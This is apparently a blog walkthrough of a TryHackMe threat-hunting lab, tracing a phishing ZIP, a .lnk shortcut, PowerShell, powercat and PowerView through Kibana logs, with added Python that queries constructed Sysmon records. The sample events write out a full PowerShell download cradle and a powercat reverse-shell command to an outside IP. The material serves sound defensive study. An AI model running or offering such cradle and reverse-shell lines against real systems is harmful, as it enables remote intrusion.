THM : Hunt Me I: Payment Collectors Part. 1

M. Said Eddak
4 min read · Mar 15, 2024


Scenario: a Senior Finance Director at the company downloaded a malicious ZIP attachment. We are called in to investigate.

This walk-through covers questions 1 to 8. See Part 2 for questions 9 to 14.

1. What was the name of the ZIP attachment that Michael downloaded?

We need to find the ZIP file that Michael downloaded. Start by filtering on user.name: michael.ascot and searching for any log that contains ".zip". Sorting the results from oldest to newest, the first hit is the suspicious ZIP file: Invoice_AT_2023-227.zip.

The same results also show the file extracted from the archive: Payment_Invoice.pdf.lnk.lnk. The doubled .lnk extension is the first warning sign: a Windows shortcut can carry an arbitrary command line as its target, which is exactly how the next step is launched.

2. What was the contained file that Michael extracted from the attachment?

From the results of question 1. Answer: Payment_Invoice.pdf.lnk.lnk

3. What was the name of the command-line process that spawned from the extracted file attachment?

Now that we have the log showing the extraction of the .lnk file, we can look at the surrounding events to see whether anything suspicious happened next. We find a suspicious use of powershell.exe, spawned from the shortcut, that downloads a file from an external URL.

Answer : powershell.exe

4. What URL did the attacker use to download a tool to establish a reverse shell connection?

From question 3 we already have the command line: PowerShell fetches a script from GitHub, powercat, which the attacker then uses to establish the reverse shell.

Answer : https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

5. What port did the workstation connect to the attacker on?

Next we hunt for any use of the downloaded file. Searching the process command lines for powercat.ps1 shows the powercat invocation directly, and with it the port the workstation connects to: 19282.

Answer: 19282
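As an added example (not code from the walkthrough or from TryHackMe), here are the Kibana hunts from questions 1 to 5 written as a few Python functions over constructed winlogbeat/ECS-style Sysmon records. The events, timestamps, paths, PIDs and the attacker IP are invented; only the field names follow ECS. The file-search helper is generalised to any suffix, so the same function answers question 1 with ".zip" and question 2 with ".lnk".

```python
"""Added example (not part of the walkthrough): the Kibana hunts from
questions 1-5 as Python functions over constructed winlogbeat/ECS-style
Sysmon records. Event ID 11 (FileCreate) carries the downloaded and
extracted files, Event ID 1 (ProcessCreate) the PowerShell download
cradle. All timestamps, paths, PIDs and the attacker IP are invented;
only the field names follow ECS."""
import re
from datetime import datetime

POWERCAT_URL = "https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1"

# Constructed sample events, deliberately out of time order (search
# results rarely come back sorted the way you want).
SAMPLE_EVENTS = [
    {"@timestamp": "2023-09-18T10:05:43Z", "winlog": {"event_id": 1},
     "user": {"name": "michael.ascot"},
     "process": {"name": "powershell.exe", "pid": 5532,
                 "parent": {"name": "explorer.exe", "pid": 4120},
                 "command_line": ('powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                                  f".DownloadString('{POWERCAT_URL}'); "
                                  'powercat -c 203.0.113.5 -p 19282 -e powershell"')}},
    {"@timestamp": "2023-09-18T10:03:02Z", "winlog": {"event_id": 11},
     "user": {"name": "michael.ascot"},
     "file": {"path": "C:\\Users\\michael.ascot\\Downloads\\Invoice_AT_2023-227\\Payment_Invoice.pdf.lnk.lnk"}},
    {"@timestamp": "2023-09-18T10:01:30Z", "winlog": {"event_id": 11},
     "user": {"name": "michael.ascot"},
     "file": {"path": "C:\\Users\\michael.ascot\\Downloads\\Invoice_AT_2023-227.zip"}},
    {"@timestamp": "2023-09-18T09:40:00Z", "winlog": {"event_id": 11},
     "user": {"name": "svc-backup"},
     "file": {"path": "D:\\Backups\\nightly-2023-09-18.zip"}},
    {"@timestamp": "2023-09-18T10:04:10Z", "winlog": {"event_id": 1},
     "user": {"name": "svc-backup"},
     "process": {"name": "powershell.exe", "pid": 2200,
                 "parent": {"name": "svchost.exe", "pid": 1100},
                 "command_line": "powershell.exe -File C:\\Scripts\\backup.ps1"}},
]


def _ts(ev):
    return datetime.fromisoformat(ev["@timestamp"].replace("Z", "+00:00"))


def user_events(events, user):
    """The walkthrough's starting filter: user.name:<user>, sorted oldest first."""
    return sorted((e for e in events if e.get("user", {}).get("name") == user), key=_ts)


def files_created(events, user, suffix):
    """Q1/Q2: FileCreate (event_id 11) paths for <user> ending in <suffix>, oldest first."""
    return [e["file"]["path"] for e in user_events(events, user)
            if e["winlog"]["event_id"] == 11
            and e["file"]["path"].lower().endswith(suffix.lower())]


URL_RE = re.compile(r"""https?://[^\s'"();]+""")
# The port follows powercat's -p switch; the lazy class cannot cross a
# command separator, so the 'powercat' inside the URL is skipped.
PORT_RE = re.compile(r"\bpowercat\b[^|;]*?-p\s+(\d{1,5})", re.I)


def download_cradles(events, user):
    """Q3/Q4: powershell.exe launches whose command line references a URL."""
    hits = []
    for e in user_events(events, user):
        if e["winlog"]["event_id"] != 1 or e["process"]["name"].lower() != "powershell.exe":
            continue
        urls = URL_RE.findall(e["process"]["command_line"])
        if urls:
            hits.append({"time": e["@timestamp"], "parent": e["process"]["parent"]["name"],
                         "urls": urls, "command_line": e["process"]["command_line"]})
    return hits


def powercat_port(command_line):
    """Q5: the -p <port> argument of a powercat invocation, or None if absent."""
    m = PORT_RE.search(command_line)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    user = "michael.ascot"
    print("Q1:", files_created(SAMPLE_EVENTS, user, ".zip")[0])
    print("Q2:", files_created(SAMPLE_EVENTS, user, ".lnk")[-1])
    for hit in download_cradles(SAMPLE_EVENTS, user):
        print("Q3/Q4:", hit["parent"], "->", hit["urls"])
        print("Q5:", powercat_port(hit["command_line"]))
```

The user filter matters: without it the svc-backup events (a legitimate backup ZIP and a scripted PowerShell run) land in the same result set, which is the noise the walkthrough sidesteps by pinning user.name first.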

6. What was the first native Windows binary the attacker ran for system enumeration after obtaining remote access?

We need to find the native binaries the attacker ran, in other words process creation events. Search for process creation with the query:
"winlog.event_id: 1" (Sysmon's process-creation event; if you were hunting in the Windows Security log instead, the equivalent is event ID 4688).

Sorting the results from oldest to newest, we quickly reach the first reverse-shell invocation, followed by the attacker's interesting process creations.

Answer : systeminfo.exe

Side note: the next logs in the same search show the attacker using net.exe to map a file share. We come back to this in question 8.

7. What is the URL of the script that the attacker downloads to enumerate the domain?

The first step is to work out which script we are talking about. Visualising the file.path field, one file dominates the results: PowerView.ps1.

With the file name in hand, search for *PowerView.ps1*, sort from oldest to newest and look at the first few logs. The second one contains what we are looking for: the download link.

Answer : https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1

8. What was the name of the file share that the attacker mapped to Michael’s workstation?

As noted in question 6, the attacker maps a share to Michael's workstation with net.exe; the share name is visible in the net use command line of that process-creation event.
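As an added example for questions 6 and 8, not part of the original post, the same idea in Python over constructed Sysmon process-creation records: sort oldest first, pivot on the powercat invocation, and read what runs after it. It goes one step beyond the walkthrough by restricting the search to the reverse shell's process tree, so that an unrelated native binary that happens to run at the same time is not mistaken for the attacker's first command. Events, PIDs, timestamps and the share \\FS01\Finance are invented; field names follow winlogbeat/ECS.

```python
"""Added example (not the walkthrough's own code) for questions 6 and 8:
sort Sysmon process-creation records (winlog.event_id: 1) oldest first,
pivot on the powercat reverse-shell process, and read only what runs
inside that process tree. Events, PIDs, timestamps, host and share
names below are constructed; field names follow winlogbeat/ECS."""
import re
from datetime import datetime

# Native Windows binaries commonly seen in post-access enumeration.
NATIVE_ENUM_BINARIES = {"systeminfo.exe", "whoami.exe", "hostname.exe", "ipconfig.exe",
                        "net.exe", "net1.exe", "tasklist.exe", "nltest.exe", "quser.exe"}

POWERCAT_URL = "https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1"


def _proc(ts, name, pid, parent_name, parent_pid, cmd):
    """Build one constructed ECS-style ProcessCreate record."""
    return {"@timestamp": ts, "winlog": {"event_id": 1}, "user": {"name": "michael.ascot"},
            "process": {"name": name, "pid": pid, "command_line": cmd,
                        "parent": {"name": parent_name, "pid": parent_pid}}}


SAMPLE_EVENTS = [  # constructed, deliberately out of time order
    _proc("2023-09-18T10:06:30Z", "systeminfo.exe", 6010, "powershell.exe", 6000, "systeminfo"),
    _proc("2023-09-18T10:05:43Z", "powershell.exe", 5532, "explorer.exe", 4120,
          'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
          f".DownloadString('{POWERCAT_URL}'); powercat -c 203.0.113.5 -p 19282 -e powershell\""),
    # powercat -e exposes a shell that appears as a child of the cradle process
    _proc("2023-09-18T10:05:45Z", "powershell.exe", 6000, "powershell.exe", 5532, "powershell"),
    # unrelated logon script: runs after the shell opens, but outside its tree
    _proc("2023-09-18T10:06:00Z", "whoami.exe", 7000, "cmd.exe", 3000, "whoami /all"),
    _proc("2023-09-18T10:07:12Z", "whoami.exe", 6020, "powershell.exe", 6000, "whoami /groups"),
    _proc("2023-09-18T10:09:05Z", "net.exe", 6040, "powershell.exe", 6000,
          "net use Z: \\\\FS01\\Finance /persistent:no"),
    # net.exe hands the real work to net1.exe with the same arguments
    _proc("2023-09-18T10:09:05Z", "net1.exe", 6041, "net.exe", 6040,
          "C:\\Windows\\system32\\net1 use Z: \\\\FS01\\Finance /persistent:no"),
]


def _ts(ev):
    return datetime.fromisoformat(ev["@timestamp"].replace("Z", "+00:00"))


def by_time(events):
    """winlog.event_id: 1 results sorted oldest first, as in the walkthrough."""
    return sorted((e for e in events if e["winlog"]["event_id"] == 1), key=_ts)


POWERCAT_RE = re.compile(r"\bpowercat\s+-c\s+\S+", re.I)


def reverse_shell_event(events):
    """The first process whose command line connects out with powercat."""
    return next((e for e in by_time(events)
                 if POWERCAT_RE.search(e["process"]["command_line"])), None)


def process_tree(events, root_pid):
    """PIDs of root plus every descendant created after it. PIDs get reused on
    real hosts, so pair this with process.entity_id / ProcessGuid when available."""
    pids = {root_pid}
    for e in by_time(events):
        if e["process"]["parent"]["pid"] in pids:
            pids.add(e["process"]["pid"])
    return pids


def post_access_timeline(events):
    """Q6: (timestamp, image, command line) for everything run inside the shell's tree."""
    shell = reverse_shell_event(events)
    if shell is None:
        return []
    tree = process_tree(events, shell["process"]["pid"])
    return [(e["@timestamp"], e["process"]["name"], e["process"]["command_line"])
            for e in by_time(events)
            if _ts(e) > _ts(shell) and e["process"]["pid"] in tree]


def first_native_binary(events):
    """Q6 answer: the first native enumeration binary in the post-access timeline."""
    return next((name for _, name, _ in post_access_timeline(events)
                 if name.lower() in NATIVE_ENUM_BINARIES), None)


NET_USE_RE = re.compile(r"\bnet1?(?:\.exe)?\s+use\s+(?:([A-Za-z]:)\s+)?(\\\\\S+)", re.I)


def mapped_shares(events):
    """Q8: (drive, UNC path) pairs from `net use` in the post-access timeline,
    deduplicated because net.exe and net1.exe log the same arguments twice."""
    seen = []
    for _, _, cmd in post_access_timeline(events):
        m = NET_USE_RE.search(cmd)
        if m and (m.group(1), m.group(2)) not in seen:
            seen.append((m.group(1), m.group(2)))
    return seen


if __name__ == "__main__":
    for ts, name, cmd in post_access_timeline(SAMPLE_EVENTS):
        print(ts, name, cmd)
    print("Q6:", first_native_binary(SAMPLE_EVENTS))
    print("Q8:", mapped_shares(SAMPLE_EVENTS))
```

Without the tree restriction the first native binary after the powercat timestamp would be the logon script's whoami.exe, not systeminfo.exe; in a real hunt the same trap appears as scheduled tasks and agents that run enumeration-looking commands all day.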

End of the first part. Part 2 can be found here: https://medium.com/@MDK_BE/thm-hunt-me-i-payment-collectors-part-2-d5bff2ce55bf
